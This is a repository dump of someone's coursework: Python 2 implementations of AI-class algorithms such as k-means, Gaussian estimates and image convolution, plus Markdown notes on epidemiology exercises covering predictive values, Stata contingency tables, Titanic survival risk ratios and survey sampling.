"/AI-Class/Algorithms-Python/MotionModel.py", "repo_name": "erichilarysmithsr/Machine-Learning", 
"src_encoding": "UTF-8", "text": "import math\r\n\r\nclass MotionModel(object):\r\n\tdef __init__(self, x0=0, y0=0, theta0=0, v=0, w=0):\r\n\t\tself.x = float(x0)\r\n\t\tself.y = float(y0)\r\n\t\tself.theta = float(theta0)\r\n\t\tself.v = float(v)\r\n\t\tself.w = float(w)\r\n\r\n\tdef __str__(self):\r\n\t\treturn 'x=%.4f, y=%.4f, theta=%.4f' % (self.x, self.y, self.theta)\r\n\r\n\tdef move(self, delta_t):\r\n\t\tnew_x = self.x + self.v * delta_t * math.cos(self.theta)\r\n\t\tnew_y = self.y + self.v * delta_t * math.sin(self.theta)\r\n\t\tnew_theta = self.theta + self.w * delta_t\r\n\r\n\t\tself.x, self.y, self.theta = new_x, new_y, new_theta\r\n\r\n\tdef move_times(self, delta_t, times):\r\n\t\tfor i in xrange(times):\r\n\t\t\tself.move(delta_t)\r\n\t\t\tprint \"time=%d, pos=%s\" % (delta_t+i*delta_t, str(self))\r\n\r\n" }, { "alpha_fraction": 0.7798036336898804, "alphanum_fraction": 0.7812061905860901, "avg_line_length": 100.42857360839844, "blob_id": "af6464435d25e7440325010be2aef9123ed69b60", "content_id": "0796d952dab5fb779fbe9ef3f982a4c0e1f8828d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 713, "license_type": "no_license", "max_line_length": 257, "num_lines": 7, "path": "/PH207x/homework/seven/Randomized Clinical Trial versus Cohort Study.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Randomized Clinical Trial versus Cohort Study #\n> The benefit of a randomized clinical trial over an observational cohort study is that, in large enough samples, the groups are identical with respect to \n> **Hint1:** A prospective cohort study is a cohort study that follows over time a group of similar individuals (cohorts) who differ with respect to certain factors under study, to determine how these factors affect rates of a certain outcome. 
(wikipedia) \n> \n> => **Other extraneous factors that are associated with the outcome of interest** \n> Factors that would make the results more generalizable to the larger population \n> Other factors related to the likelihood of participating in a study \n\n\n" }, { "alpha_fraction": 0.5538336038589478, "alphanum_fraction": 0.5866231918334961, "avg_line_length": 22.520000457763672, "blob_id": "c88f576343f2bafb44c02f9b344c0382c95894e7", "content_id": "c25e4ed87dcd96492b5e818ef8e5d45117c39e4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6130, "license_type": "no_license", "max_line_length": 97, "num_lines": 250, "path": "/AI-Class/Algorithms-Python/KMeans.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "from math import pow\r\nfrom math import sqrt\r\nfrom math import exp\r\nfrom math import pi\r\nimport random\r\n\r\ntau = (2 * pi)\r\n\r\nclass KMeans:\r\n\t\"\"\"\r\n\tAttempt to implement the KMeans algorithm\r\n\tas described in Unit 6 of the AI class.\r\n\t\"\"\"\r\n\r\n\tdef __init__(self,k,data,max_guess=(100,100),min_guess=(-100,-100)):\r\n\t\t\"\"\"\r\n\t\tConstruct a K-means with the given parameters.\r\n\r\n\t\t'max_guess' and 'min_guess' control the range of values\r\n\t\tused when generating random cluster centers; the author\r\n\t\thas not thought very hard about a way to generate values\r\n\t\tthat are always guaranteed to work no matter what data we\r\n\t\thave.\r\n\t\t\"\"\"\r\n\t\tself.k = k\r\n\t\tself.data = data\r\n\t\tself.max_guess = max_guess\r\n\t\tself.min_guess = min_guess\r\n\r\n\tdef rand_cluster_center(self):\r\n\t\tx = random.uniform(self.min_guess[0],self.max_guess[0])\r\n\t\ty = random.uniform(self.min_guess[1],self.max_guess[1])\r\n\t\treturn x, y\r\n\r\n\tdef dist(self, a, b):\r\n\t\tax, ay = a[1], a[2]\r\n\t\tbx, by = b[1], b[2]\r\n\t\treturn sqrt( pow(by-ay,2)+pow(bx-ax,2) )\r\n\r\n\tdef centers(self):\r\n\t\tcenters = 
[]\r\n\t\tfor i in xrange(self.k):\r\n\t\t\trc = self.rand_cluster_center()\r\n\t\t\tcenters.append([i, rc[0], rc[1]])\r\n\t\treturn centers\r\n\r\n\tdef closest_center(self, centers, datum):\r\n\t\t\tclosest = None\r\n\t\t\tclosest_d = None\r\n\t\t\tfor c in centers:\r\n\t\t\t\td = self.dist(c, datum)\r\n\t\t\t\tif closest is None or d < closest_d:\r\n\t\t\t\t\tclosest = c\r\n\t\t\t\t\tclosest_d = d\r\n\t\t\treturn (closest, closest_d)\r\n\t\r\n\tdef mean(self, data_points):\r\n\t\tn = float(len(data_points))\r\n\t\tmean_x = sum( [dp[1] for dp in data_points] ) / n\r\n\t\tmean_y = sum( [dp[2] for dp in data_points] ) / n\r\n\t\treturn (mean_x, mean_y)\r\n\r\n\tdef kmeans(self,initial_centers=None,tolerance=0):\r\n\t\t\"\"\" Run the K-means algorithm to convergence \r\n\t\t\t(or until the difference in an old and new cluster\r\n\t\t\tcenter in one iteration is <= tolerance)\r\n\t\t\"\"\"\r\n\t\tcenters = initial_centers \\\r\n\t\t\t\tif initial_centers is not None else self.centers()\r\n\t\t\r\n\t\titerations = 0\r\n\t\twhile True:\r\n\t\t\titerations = iterations + 1\r\n\t\t\tclusters = dict([(i,[]) for i in xrange(self.k)])\r\n\t\t\tfor a in self.data:\r\n\t\t\t\tcc = self.closest_center(centers, a)\r\n\t\t\t\tcenter = cc[0]\r\n\t\t\t\tlabel = center[0]\r\n\t\t\t\tclusters[label].append(a)\r\n\r\n\t\t\tfor label, data_points in clusters.iteritems():\r\n\t\t\t\tif not data_points:\r\n\t\t\t\t\tcenters = self.centers()\r\n\t\t\t\t\tbreak # restart at random\r\n\r\n\t\t\t\tcenter = centers[label]\r\n\t\t\t\told_center_x, old_center_y = center[1], center[2]\r\n\t\t\t\tnew_center_x, new_center_y = self.mean(data_points)\r\n\r\n\t\t\t\tif abs(new_center_x - old_center_x) <= tolerance \\\r\n\t\t\t\t\t\tand abs(new_center_y - old_center_y) <= tolerance:\r\n\t\t\t\t\t# converged\r\n\t\t\t\t\treturn {\r\n\t\t\t\t\t\t\t'iterations' : iterations,\r\n\t\t\t\t\t\t\t'clusters' : clusters, \\\r\n\t\t\t\t\t\t\t'centers' : centers }\r\n\r\n\t\t\t\t# update center to 
mean\r\n\t\t\t\tcenter[1] = new_center_x\r\n\t\t\t\tcenter[2] = new_center_y\r\n\r\ndef mean(v,M):\r\n\treturn sum( v ) / float(M)\r\n\r\ndef variance(v,u):\r\n\treturn mean( ( (pow((x - u),2) for x in v)), len(v) )\r\n\r\ndef transpose(v, dims):\r\n\t\"Swap rows and columns\"\r\n\r\n\tnumRows = len(v)\r\n\tt = dims*[None] \r\n\tfor i in range(dims):\r\n\t\tt[i] = numRows* [None]\r\n\t\tfor j in range(numRows):\r\n\t\t\tt[i][j] = v[j][i]\r\n\treturn t\r\n\r\ndef matrixMultiply(a, colsA, b, colsB):\r\n\t\"\"\"Multiply to matrices\r\n\t\r\n\t\tVery basic and inefficient implementation; \r\n\t\tnothing near the sophistication of Strassen's algorithm \r\n\t\tis used.\"\"\"\r\n\trowsA = len(a)\r\n\trowsB = len(b)\r\n\r\n\t# rowsA x colsA ... rowsB x colsB \r\n\tassert rowsA == colsB, \"matrix dimensions not fit for multiplication\"\r\n\r\n\t# result size: rowsA x colsB\r\n\tr = rowsA * [None]\r\n\tfor i in range(rowsA):\r\n\t\tr[i] = colsB * [None]\r\n\t\tfor j in range(colsB):\r\n\t\t\t\tr[i][j] = sum( a[i][k]* b[k][j] for k in range(colsA))\r\n\treturn r\r\n\r\ndef scalarMultiply(a, cols, x):\r\n\t\"\"\" Multiplies the matrix a by the scalar x.\"\"\"\r\n\tr = len(a) * [None]\r\n\tfor i in range(len(a)):\r\n\t\tr[i] = cols * [None]\r\n\t\tfor j in range(cols):\r\n\t\t\tr[i][j] = a[i][j] * x\r\n\treturn r\r\n\t\r\n\r\ndef subtractRows(a, colsA, b):\r\n\t\"\"\" Subtract the tuple b from each row of matrix a. 
The length of b must be the dimentions of a.\r\n\t\r\n\tEx.:\r\n\t3 8 -2 3\r\n\t4 7 - 5 5 = -1 2\r\n\t5 5 0 0\r\n\t\"\"\"\r\n\tassert colsA == len(b), \"incompatible dimensions for subtractRows\"\r\n\tr = len(a)*[None]\r\n\tfor i in range(len(a)):\r\n\t\tr[i] = colsA * [None]\r\n\t\tfor j in range(colsA):\r\n\t\t\tr[i][j] = a[i][j] - b[j]\r\n\treturn r\r\n\r\ndef printMatrix(a):\r\n\tbuf = []\r\n\tfmt = \"%5s\"\r\n\tfor x in a:\r\n\t\tbuf.append('[')\r\n\t\tfor y in x:\r\n\t\t\tbuf.append(fmt % str(y))\r\n\t\tbuf.append(']\\n')\r\n\tprint ''.join(buf)\r\n\r\n\r\n\r\nclass Gauss:\r\n\t\"\"\"\r\n\tGaussian distribution for input vector v:\r\n\r\n\tmean = 1/ M sum( Xi )\r\n\tvariance = 1 / M * sum( (Xi - mean)^2 )\r\n\r\n\t>>> Gauss([3,4,5,6,7]).mean()\r\n\t5.0\r\n\t\r\n\t>>> Gauss([3,4,5,6,7]).variance()\r\n\t2.0\r\n\r\n\t>>> Gauss([3,4,5,6,7]).p(3.456)\r\n\t0.1848502338825046\r\n\t\"\"\"\r\n\r\n\tdef __init__(s, v=None):\r\n\t\ts.v = v if v is not None else [1]\r\n\r\n\tdef mean(s):\r\n\t\treturn mean( (x for x in s.v), len(s.v))\r\n\r\n\tdef variance(s):\r\n\t\treturn variance(s.v, s.mean())\r\n\r\n\tdef p(s, x):\r\n\t\tmu = s.mean()\r\n\t\tsigma2 = s.variance()\r\n\t\tsigma = sqrt(sigma2)\r\n\t\treturn 1/sqrt( tau * sigma ) * exp( -.5 * pow(x - mu, 2) / sigma2 )\r\n\r\nclass MultiGauss:\r\n\t\"\"\"\r\n\tMultiGauss(2, [(1,2),(3,4),(5,6)])\r\n\r\n\tSpecifiy dimensions and then vector of tuples.\r\n\r\n\tExample:\r\n\t>>> MultiGauss(2, [[3,8],[4,7],[5,5],[6,3],[7,2]]).variances()\r\n\t[[2.0, -3.2000000000000002], [-3.2000000000000002, 5.2000000000000002]]\r\n\r\n\t>>> MultiGauss(2, [[3,8],[4,7],[5,5],[6,3],[7,2]]).means()\r\n\t(5.0, 5.0)\r\n\t\"\"\"\r\n\tdef __init__(s, dims, v):\r\n\t\ts.dims = dims\r\n\t\ts.v = v\r\n\r\n\tdef means(s):\r\n\t\t\"Returns the mean of each dimenion as a tuple\"\r\n\t\treturn [ mean( (x[i] for x in s.v), len(s.v) ) for i in range(s.dims)]\r\n\r\n\tdef variances(s):\r\n\t\tmeans = s.means()\r\n\t\txMinusU = subtractRows(s.v, s.dims, 
means)\r\n\t\txMinusU_T = transpose(xMinusU, s.dims)\r\n\t\tr = matrixMultiply(xMinusU_T, len(s.v), xMinusU, s.dims)\r\n\t\treturn scalarMultiply(r, s.dims, 1/float(len(s.v)))\r\n\r\n\r\ndef testIt():\r\n\tmg = MultiGauss(2, [[3,8],[4,7],[5,5],[6,3],[7,2]])\r\n\r\n\tprint \"data:\"\r\n\tprintMatrix(mg.v)\r\n\r\n\tprint \"means:\"\r\n\tprintMatrix([mg.means()])\r\n\r\n\tprint \"variances:\"\r\n\tprintMatrix(mg.variances())\r\n\r\ntestIt()\r\n" }, { "alpha_fraction": 0.6624161005020142, "alphanum_fraction": 0.7288590669631958, "avg_line_length": 58.599998474121094, "blob_id": "7c0b828fdd14b7d283c3b9d9820e264a3b45a36d", "content_id": "55b66fbff87e9b9e32d9c06aa63f5f3f9daf0d83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1490, "license_type": "no_license", "max_line_length": 310, "num_lines": 25, "path": "/PH207x/excercises/step by step guidance for PPV and NPV.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Step by step guidance for PPV and NPV\n\n## Pre Test\nPretest: Prevalence is 16.1%. Which means out of 100 people, 16.1 people have disease. That means 100 - 16.1 do not have the disease.\n\n## Post Test\n1. When the test is carried out, ideally all 16.1 should test positive, But the sensitivity being 0.721, out of 16.1, only (16.1 * 0.721) test positive. Remaining test -ve inspite of having disease. So 16.1 - (16.1 * 0.721) is the number of cases who have disease and yet have tested negative (False Negative).\n\n2. So the proportion who test FN is = Number tested False Negative in Step 2 / Total No of patients with disease (16.1). This will give you your FN rate.\n\n3. Now from Step 1 we know how many people do not have disease. This is the number which should ideally test -ve if the specificity was 100% i.e. 1. But since specificity is only 0.932, only (100 - 16.1) * 0.932 test -ve.\n\n4. 
This means ((100 - 16.1) - (100 - 16.1) * 0.932) test positive inspite of not having a disease. These are your False Positive Cases.\n\n5. So now calculate the FP rate similar to how we calculated FN rate.\n\n6. Now you have your FN and FP rates. Be happy.\n\n7. Now your PPV is TRUE POSITIVE / TOTAL POSITIVE. Here true positive is the value you got in Step 2 (16.1* sensitivity)). And Total Positives is this value plus FP you got in step 5.\n\n8. Similarly your NPV is True Negative / Total Negative values.\n\n9. Use the formula 1-PPV and 1-NPV.\n\n10. If you get all correct, you must wear a big smile!\n" }, { "alpha_fraction": 0.7340339422225952, "alphanum_fraction": 0.7409054040908813, "avg_line_length": 61.38461685180664, "blob_id": "6f95fedd8524475721e539d862b32b3a1ad1d2ea", "content_id": "5516694902e1216cd58a8bffe90ae27d13a534cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2474, "license_type": "no_license", "max_line_length": 282, "num_lines": 39, "path": "/AI-Class/Algorithms-Python/README.txt", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "This README file is a duplicate of the following aiqus.com post:\r\nhttp://www.aiqus.com/questions/31667/source-code-used-for-ai-class\r\n\r\nhttps://bitbucket.org/les2/aiclass/src\r\n\r\nThere is the source code I used throughout the course. 
There are the following files:\r\n\r\n PixelAlignment.py - pixel correspondence from scan lines\r\n KMeans.py - k-means algorithm as well as guassian and multivariate guassian regressions\r\n Sched.py - task network scheduling\r\n Smooth.py - Laplacian smoother that also does Markov chains (e.g., 'ABBBAAABA', what's P(A followed by A)\r\n ValIter.py - value iteration algorithm for MDP / grid world; you can customize the actions allowed (e.g., N/S/E/W or NE/NW/SE/SW) and combine stochastic and deterministic actions; the state space is only two dimensions so it will not handle a heading\r\n LinearFilter.py - convolve and image with a kernel\r\n LinearRegression.py - linear regression (find the w0 and w1)\r\n\r\nI used these programs for the homeworks / exams, so they work for the examples in class. They're documented to varying degrees and typically includes pydoc tests (unit tests embedded in the documentation).\r\n\r\nI'm not a Python expert, so the code is definitely rough around the edges. Some of it is definitely quick-and-dirty. I like to think that the code because more 'pythonic' with time. Python is definitely way better than Java in terms of ease of use (and I say that as a Java expert).\r\n\r\nI use Python 2.6.5 in Cygwin, so I know that will work. Your mileage will vary with other versions of Python.\r\n\r\nFor the Python novices, use python -i {file name} to load one of the files in the Python REPL (read-evaluate-print-loop). That makes it easy to play around with the code.\r\n\r\nLet me know if you have problems getting started or if you have suggestions.\r\n\r\n===================\r\n You Might Need\r\n===================\r\n\tPython 2.6.5 Reference http://docs.python.org/release/2.6.5/\r\n\t\tStart here if you are new to Python. If there is something in the source code that you don't understand, try\r\n\t\tto find it in the reference. 
Check out the tutorials!\r\n\r\n\tCygwin http://www.cygwin.com/\r\n\t\tYou will need this if you are a Microsoft Windows user and want to do serious programming.\r\n\t\tThis is probably the EASIEST WAY TO INSTALL PYTHON ON WINDOWS. Cygwin allows you to install Python\r\n\t\tusing its installer.\r\n\r\n\tGVim http://www.vim.org/download.php\r\n\t\tThe best text editor on the planet (and possibly in the universe).\r\n\r\n" }, { "alpha_fraction": 0.731596827507019, "alphanum_fraction": 0.7361268401145935, "avg_line_length": 22.810810089111328, "blob_id": "da4fd3c5da113f5c1228ab73058f963487875504", "content_id": "161f1d9a113fca6afd6124af6619fa8d5352366d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 883, "license_type": "no_license", "max_line_length": 81, "num_lines": 37, "path": "/PH207x/excercises/Lesson7/Tutorial: Contingency Tables.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Tutorial: Contingency Tables #\n> *cs* - Cohort Study, estimate an Odds Ratio (OR), Pearson Chi-square \n> *tabulate* - Conduct a Pearson Chi-square test, R x C \n\n\tuse \"chis_healthdisparities.dta\", replace\n\ttabulate poverty doctor, row\n\ttabulate poverty doctor, row expected\n\n\tcs doctor poverty, or woolf\n\n\tgen nopoverty = 1-poverty\n\tcs doctor nopoverty, or woolf\n\n\n##Pearson Chi-square test##\n> **Step1:**\n\n\ttabulate poverty doctor, row expected\n\n> Look if all expected cell counts (expected frequency command) are higher than 5\n\n\tcs doctor poverty, or woolf\n\ttabulate poverty doctor, row expected chi2\n\n## Presenting Results ##\n> *Cohort Study*: Use the **Risk difference** \n> Never use the p-value to present the results.\n\n# Install R by C table addon for stata#\n\n\tssc install tabplot\n\n> Example:\n\n\ttabplot racecat poverty\n\ttabplot poverty racecat\n\ttabulate racecat pov, row\n\n\n" }, { "alpha_fraction": 0.6121336221694946, "alphanum_fraction": 
0.6612133383750916, "avg_line_length": 27.134614944458008, "blob_id": "e0c0d705bb917b4cbebf0f16ad34345e0333d060", "content_id": "d64f7fee02a960689b978f56f51025f458f7195c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1467, "license_type": "no_license", "max_line_length": 201, "num_lines": 52, "path": "/PH207x/excercises/Lesson7/ Tutorial: One-sample proportions.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Tutorial: One-sample proportions #\n\n## Confidence Intervals ##\n> *ci* and *cii* calculate **binomial confidence** intervals\n\n## Hypothesis Tests ##\n> *bitest* and *bitesti* **exact binomial** one-sample proportion hypothesis test \n> *prtest* and *prtesti* **large sample one sample** proportion hypothesis test\n\n### 1. We're going to do is estimate the proportion of California residents who visit the doctor at least once in the previous year. Lets denote this p. ###\n> For small samples use exact and for big samples use Wald methods. \n\n\tci doctor, binomial\n\tci doctor, binomial wald\n\tci doctor, binomial wilson\n\n\n#### Is it reasonable to use the wald interval? ####\n> n*p > 5 \n> 500*0.804= 402 \n> **So its higher than 5!** \n> **It is the easted to calculate, so we see this in reality very often**\n\n\n#### We'll look at these confidence intervals and decide whether there's evidence that at the 95% confidence level, do we think that at least 80% of the population visits the doctor once per year. ####\n\n> poverty level\n\n\tby poverty, sort : ci doctor, binomial\n\n\n> H_0: P_1= 0.8\n> H_A: P_1 != 0.8\n> alpha= 0.05\n\n\tbitesti 100 50 0.8\n\tbitest doctor == 0.8 if poverty==1\n\n### Look at the large sample test ###\n> At first we test if the binomial distribution is appropriate. 
\n> \n> n_1*P_1 > 5 \n> 63*0.8= 50.4 > 5 \n> \n> n_1(1-P_1) > 5 \n> 63*.2= 12.6 > 5 \n> \n> H_0: P_1= 0.8 \n> H_A: P_1 != 0.8 \n> alpha= 0.05 \n\n\tprtest doctor == 0.8 if poverty==1\n\n\n\n\n" }, { "alpha_fraction": 0.6010042428970337, "alphanum_fraction": 0.6701428890228271, "avg_line_length": 54.04255294799805, "blob_id": "2673a12ec87b66d4b75ee7d889adb6e79991abc5", "content_id": "2b636e52e9462fa8c2509d6a47a8e84bf18f133e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2617, "license_type": "no_license", "max_line_length": 885, "num_lines": 47, "path": "/PH207x/homework/four/Titanic Survival Risk Ratios.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Titanic Survival Risk Ratios \nThe following table describes the survival status of passengers on the Titanic, stratified by Passenger Class (First, Second, or Third), Sex/Age (Child, Women, or Man), and Survival Status. The Frequency column indicates the number of passengers in each stratum. (For example there were 4 1st class women passengers who did not survive and 140 1st class women passengers who did survive). These data were obtained from the website anesi.com and refers to British Parliamentary Papers, Shipping. Casualties (Loss of the Steamship “Titanic”), 1912. cmd 6352 “Report of a Formal Investigation into the circumstances attending the foundering on the 15th April 1912 of the British Steamship “Titanic” of Liverpool after striking ice in or near Latitude 41 46 N., Longitude 50 14 W., North Atlantic Ocean, whereby loss of life ensued (London; His Majesty’s Stationary Office, 1912) page 42. 
\n\nPassenger Class | Age/Sex | Survival Status | Frequency\n--------------- | ------- | --------------- | -----------\nFirst | Child | Survived | 6\nFirst | Child | Did not survive | 0\nFirst | Woman | Survived | 140\nFirst | Woman | Did not survive | 4\nFirst | Man | Survived | 57\nFirst | Man | Did not survive | 118\nSecond | Child | Survived | 24\nSecond | Child | Did not survive | 0\nSecond | Woman | Survived | 80\nSecond | Woman | Did not survive | 13\nSecond | Man | Survived | 14\nSecond | Man | Did not survive | 154\nThird | Child | Survived | 27\nThird | Child | Did not survive | 52\nThird | Woman | Survived | 76\nThird | Woman | Did not survive | 89\nThird | Man | Survived | 75\nThird | Man | Did not survive | 387\n\n##### Q1. Use these data to calculate the Risk Ratio for surviving comparing “women or children” as the exposed group and “all other passengers” as the non-exposed group. #####\n\n>\tSurviving Risk Ratio= ?\n\n> | Died | Surviving | Total | Estimated Risk\n> ------------------ | ---- | --------- | ----- | ------------------\n> Women or children | 158 | 353 | 511 | 353/511= 0.69080235\n> All other | 659 | 146 | 805 | 146/805= 0.18136646\n\n>\tRisk Ratio: RR= 0.69080235 / 0.18136646= **3.808876**\n\n\n\n##### Q2. Use these data to calculate the Risk Ratio for surviving comparing “women or children” as the exposed group and “all other passengers” as the non-exposed group for each passenger class. 
#####\n\n###### a) First Class ######\n>\tSurviving Risk Ratio= **2,9883040936**\n\n###### b) Second Class ######\n>\tSurviving Risk Ratio= **10,6666666667**\n\n###### c) Third Class ######\n>\tSurviving Risk Ratio= **2,6003278689**\n\n\n" }, { "alpha_fraction": 0.4514550566673279, "alphanum_fraction": 0.544681966304779, "avg_line_length": 58.67692184448242, "blob_id": "191901e6cb5166ff4dcb8ae0d3b8a078ce2ff368", "content_id": "3d73512d33d06d5f98a910c6cb2db178820eda14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3883, "license_type": "no_license", "max_line_length": 422, "num_lines": 65, "path": "/PH207x/excercises/Lesson9/Stata Demo Module 9.1 - Age-adjusted Incidence Rate.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "## Stata Demo Module 9.2: Age-adjusted Incidence Rate ##\n* Calculate the crude incidence rate ratio of CHD for smokers compared to nonsmokers in Stata\n* Calculate the age-adjusted incidence rate ratio of CHD for smokers compared to nonsmokers in Stata\n\n> Outcome like CHD we want to use incident rate ratios and incidence rates instead of risks or risk ratios. The issue with an outcome like CHD is that we might not have complete follow up for everyone. They may have dropped out of the study or suffered a competing risk before we could observe whether or not they developed CHD. \n> Because of this we're just going to use person-time. 
We have the amount of time that someone was followed for CHD, and we'll use the person-time and the number of CHD cases to calculate incidence rate ratios.\n\n#### So now let's go to Stata and calculate the crude incidence rate ratio of CHD #####\n\n```stata\n\tuse \"framingham_dataset.dta\"\n\tir anychd cursmoke1 timechd\n```\n\n```stata\n | Current smoker, exam 1 |\n | Exposed Unexposed | Total\n-----------------+------------------------+------------\nIncident Hosp MI | 617 623 | 1240\nTime [years] to | 39636.77 41288.39 | 80925.16\n-----------------+------------------------+------------\n | |\n Incidence rate | .0155664 .015089 | .0153228\n | |\n | Point estimate | [95% Conf. Interval]\n |------------------------+------------------------\n Inc. rate diff. | .0004774 | -.0012292 .002184 \n Inc. rate ratio | 1.031637 | .9214548 1.154975 (exact)\n Attr. frac. ex. | .0306665 | -.0852404 .1341806 (exact)\n Attr. frac. pop | .0152591 |\n +-------------------------------------------------\n (midp) Pr(k>=617) = 0.2917 (exact)\n (midp) 2*Pr(k>=617) = 0.5835 (exact)\n```\n\n> **The incidence rate ratio in this study is 1.03. That means that people who smoke have 1.03 times the rate of developing CHD compared to nonsmokers.**\n\n### Age-adjusted incidence rate ratio of CHD ###\n\n```stata\n\tgen age4cat=.\n\treplace age4cat=0 if (age1<=40)\n\treplace age4cat=1 if (age1>40 & age1 <=50)\n\treplace age4cat=2 if (age1>50 & age1 <=60)\n\treplace age4cat=3 if (age1>60 & age1 < .)\n\n\tir anychd cursmoke1 timechd, by(age4cat)\n```\n\n```stata\n age4cat | IRR [95% Conf. 
Interval] M-H Weight\n-----------------+-------------------------------------------------\n 0 | 1.270157 .8685574 1.879063 25.9039 (exact)\n 1 | 1.340651 1.084671 1.662353 79.13065 (exact)\n 2 | 1.280713 1.057269 1.549966 95.51036 (exact)\n 3 | 1.205179 .9301212 1.552003 54.86073 (exact)\n-----------------+-------------------------------------------------\n Crude | 1.031637 .9214548 1.154975 (exact)\n M-H combined | 1.281988 1.142602 1.438378\n-------------------------------------------------------------------\n Test of homogeneity (M-H) chi2(3) = 0.42 Pr>chi2 = 0.9362\n```\n\n> And this age-adjusted incidence rate ratio is right there, and it's 1.28. This means that after adjusting for age, people who are smokers have 1.28 times the rate of developing CHD compared to people who are nonsmokers. Now you can see that there's a pretty big difference in the incidence rate ratios between the crude incidence rate ratio which is 1.03, and the Mantel-Haenszel age adjusted rate ratio which is 1.28. \n> So this does support that there probably was some confounding by age. Because after we adjusted for age we're getting an effect estimate that is closer to the truth.\n\n\n\n\n" }, { "alpha_fraction": 0.3766954243183136, "alphanum_fraction": 0.5018495917320251, "avg_line_length": 26.964284896850586, "blob_id": "5d584d61f560ce10ae340a62e31c24081b939565", "content_id": "dbcdf40d7bfe879f0683419cd514fffd770edbfb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1622, "license_type": "no_license", "max_line_length": 96, "num_lines": 56, "path": "/AI-Class/Algorithms-Python/LinearFilter.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "\"\"\"Computer vision related stuff for Unit 16.\"\"\"\r\n\r\ndef dims(matrix):\r\n\tif not matrix:\r\n\t\treturn (0, 0)\r\n\trows = len(matrix)\r\n\tassert rows > 0, \"impossible? 
rows <= 0: \" + rows\r\n\treturn (rows, len(matrix[0]))\r\n\r\ndef convolve(image, kernel):\r\n\t\"\"\"Convolves the image with the kernel as shown in Unit 16-19 \r\n\tand returns the result, that is, implements the linear filter \r\n\talgorithm from 16-21:\r\n\r\n\tI'(x,y) = Sum( I(x - v, y - v) * g(u, v) for all u and v )\r\n\twhere I is the input image, I' is the output, and g is the\r\n\tkernel which is applied to I.\r\n\r\n\t>>> convolve([[255, 212, 7, 1, 3], [211, 237, 3, 9, 0]], [[1, -1]])\r\n\t[[43, 205, 6, -2], [-26, 234, -6, 9]]\r\n\r\n\t>>> convolve([[255,7,3],[212,240,4],[218,216,230]], [[-1, 1]])\r\n\t[[-248, -4], [28, -236], [-2, 14]]\r\n\r\n\t>>> convolve([[12, 18, 6],[2, 1, 7],[100, 140, 130]],[[-1],[1]])\r\n\t[[-10, -17, 1], [98, 139, 123]]\r\n\r\n\t>>> m = [[50, 67, 80],[255, 10, 2],[73, 86, 11]]\r\n\t>>> k = [[1, 0, -1], [2, 0, -2], [1, 0, -1]]\r\n\t>>> convolve(m, k)\r\n\t[[538]]\r\n\t>>> convolve(k, m)\r\n\t[[538]]\r\n\t>>> k = [[0, 0, 0, 0, 0],[0, 1, 0, -1, 0], [0, 2, 0, -2, 0], [0, 1, 0, -1, 0], [0, 0, 0, 0, 0]]\r\n\t>>> convolve(k, m)\r\n\t[[182, 377, -182], [173, 538, -173], [144, 193, -144]]\r\n\t\r\n\t\"\"\"\r\n\tl, k = dims(image)\r\n\tn, m = dims(kernel)\r\n\r\n\tnum_rows = l - n + 1\r\n\tnum_cols = k - m + 1\r\n\tresult = []\r\n\tfor i in xrange(num_rows):\r\n\t\trow = [None]*(num_cols)\r\n\t\tfor j in xrange(num_cols):\r\n\t\t\trow[j] = sum([ (kernel[u][v]*image[i+u][j+v]) \\\r\n\t\t\t\t\tfor u in xrange(n) \\\r\n\t\t\t\t\t\tfor v in xrange(m) ])\r\n\t\tresult.append(row)\r\n\treturn result\r\n\r\nif __name__ == '__main__':\r\n\timport doctest\r\n\tdoctest.testmod()\r\n" }, { "alpha_fraction": 0.6576244831085205, "alphanum_fraction": 0.6848927140235901, "avg_line_length": 38.213890075683594, "blob_id": "90c815f887853f72066104959586f6d7f05cf353", "content_id": "60ab46f3bf881343f499f89f47b3184b33214391", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 14119, "license_type": 
"no_license", "max_line_length": 687, "num_lines": 360, "path": "/PH207x/excercises/Lesson8/Survey Data Analysis.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "## Sampling Methods ##\nSeveral Sampling methods:\n\n* Simple Random Sampling (SRS) \n* Stratified Sampling \n* Cluster Sampling \n* Stratified Cluster Sampling\n\n### Design Effect ###\nDesign Effect (DEFF) is the ratio of the variance under the design used, to the variance with simple random sampling. e.g. DEFF=2 means you need twice as big a sample to get the same variance as you would get with a simple random sample.\n\n## Tutorial: Survey Designs ##\n> Real-world, publicly available survey data is often very complex. Consequently, we will use \"hypothetical\" data for all of the tutorials in this week's tutorial sequence, estimating p, the prevalence of a disease, say malaria, in a hypothetical country, called Inventia.\n\nProvince | Population size | Number of districts\n-------- | --------------- | --------------------\n 1 | 225000 | 50\n 2 | 150000 | 42\n 3 | 100000 | 32\n 4 | 25000 | 23\n Total | 500000 | 146\n\n> We know that p differs between different provinces, due to the different hypothetical climates in each area. p may also vary somewhat between districts, given different access to malaria prevention. For instance, urban populations may have more resources to prevent malaria, and thus a lower prevalence. The true prevalence of malaria in Inventia is 13.1%. 
